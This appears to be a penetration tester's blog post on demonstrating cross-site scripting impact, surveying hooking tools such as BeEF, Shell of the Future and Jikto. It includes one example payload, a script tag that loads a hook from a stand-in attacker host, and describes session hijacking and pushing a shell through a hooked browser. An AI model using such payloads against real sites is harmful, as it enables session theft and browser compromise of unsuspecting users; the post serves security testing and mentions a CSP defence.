Cross-Site Scripting (which I discussed in a previous post) is a fairly simple attack to find and prove. Actually making it do something useful, however, is often elusive. The common vector is usually something like stealing cookies or session IDs.
In a penetration test, you will find it difficult to convey the criticality of a threat with a simple alert() box containing some text. Fortunately, there are a few tools out there that can help us demonstrate the danger of XSS. Most of them are delivered through an injection that loads the tool's hook script from a server you control, similar to this:
<script src="http://badurl.com/eviljs.js"></script>
Note that an <img> tag whose src points at a .js file will not execute it; the hook has to be pulled in by a <script> element, or by an event handler (for example <img src=x onerror=...>) that creates one. Because the hook is fetched from an attacker-controlled origin, a Content-Security-Policy script-src that does not allow that origin blocks this delivery, which is the first thing to check when a client asks why the finding matters.
- Browser Exploitation Framework (BeEF) – This amazing tool is my favorite stop for exploiting XSS beyond alert boxes. When the victim's browser executes the hook JS, it checks in with the BeEF server (a PHP page in this version), which then allows a variety of attacks to be launched against that browser. The attacker sees the hooked browser appear as a “zombie” and can do as they wish with it. The basics are included, as well as some Metasploit integration (e.g. the Java applet attack). From there it is possible to push a shell through and turn a hooked browser into a more lasting foothold on the target machine.
- Shell of the Future – Another great tool for session hijacking via XSS. It relies on HTML5 cross-origin requests (CORS-enabled XMLHttpRequest). When the victim executes the payload, their browser opens a connection back to SotF's web server (hosted on your machine). On the attacker side, SotF runs a local proxy that talks to that server, so every request the attacker sends through the proxy is replayed by the victim's browser with the victim's cookies attached. The attacker browses to the SotF console, selects the victim, and can then browse the target site using the victim's session.
- Jikto – This tool received a lot of media attention when it was released, and it was questioned whether any legitimate use of it was feasible. It works like this: when the victim executes the JS, their browser is hooked into a botnet. From there the client can search for, port scan, and exploit other XSS victims it discovers. The last I looked, most of the source code was hidden away (or the mirrors had been taken down).
- Others – There are others out there, such as XSS Shell. I won't go into detail on those because their capabilities are similar to the ones listed above. If you have favorites of your own, please post a comment so others can look into them.
I hope this was a little helpful.